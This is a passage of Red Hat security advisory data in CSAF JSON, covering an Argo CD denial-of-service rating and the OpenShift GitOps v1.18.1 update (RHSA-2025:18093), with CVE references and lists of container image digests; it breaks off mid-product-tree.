"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd: Argo CD unauthenticated Remote Denial of Service"
}
]
}
RHSA-2025:18093
Vulnerability from csaf_redhat - Published: 2025-10-15 10:27 - Updated: 2025-11-21 19:38Summary
Red Hat Security Advisory: Red Hat OpenShift GitOps v1.18.1 security update
Notes
Topic
Important: Red Hat OpenShift GitOps v1.18.1 security update
Details
An update is now available for Red Hat OpenShift GitOps.
Bug Fix(es) and Enhancement(s):
* GITOPS-7606 (ApplicationSet: Bitbucket SCM/PR generator leaks HTTP connections)
* GITOPS-7953 (Default resource exclusions list not updated in ArgoCD CR template)
* GITOPS-7955 ([1.18] ArgoCD UI fails when Progressive sync is enabled in AppSet but not controller)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Important: Red Hat OpenShift GitOps v1.18.1 security update",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for Red Hat OpenShift GitOps.\nBug Fix(es) and Enhancement(s):\n* GITOPS-7606 (ApplicationSet: Bitbucket SCM/PR generator leaks HTTP connections)\n* GITOPS-7953 (Default resource exclusions list not updated in ArgoCD CR template)\n* GITOPS-7955 ([1.18] ArgoCD UI fails when Progressive sync is enabled in AppSet but not controller)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:18093",
"url": "https://access.redhat.com/errata/RHSA-2025:18093"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55191",
"url": "https://access.redhat.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59531",
"url": "https://access.redhat.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59537",
"url": "https://access.redhat.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59538",
"url": "https://access.redhat.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_gitops/1.18/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_gitops/1.18/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_18093.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift GitOps v1.18.1 security update",
"tracking": {
"current_release_date": "2025-11-21T19:38:46+00:00",
"generator": {
"date": "2025-11-21T19:38:46+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2025:18093",
"initial_release_date": "2025-10-15T10:27:05+00:00",
"revision_history": [
{
"date": "2025-10-15T10:27:05+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-10-15T10:27:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:38:46+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.18",
"product": {
"name": "Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.18::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3A5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3A3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3Aa5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Ae7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3A94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3Acc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Ab0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3Aa2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3A2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Af8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3Ab0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3A67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3A2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3A22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3Af20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Ab8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3Ab756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256%3Aa27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3Aa424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
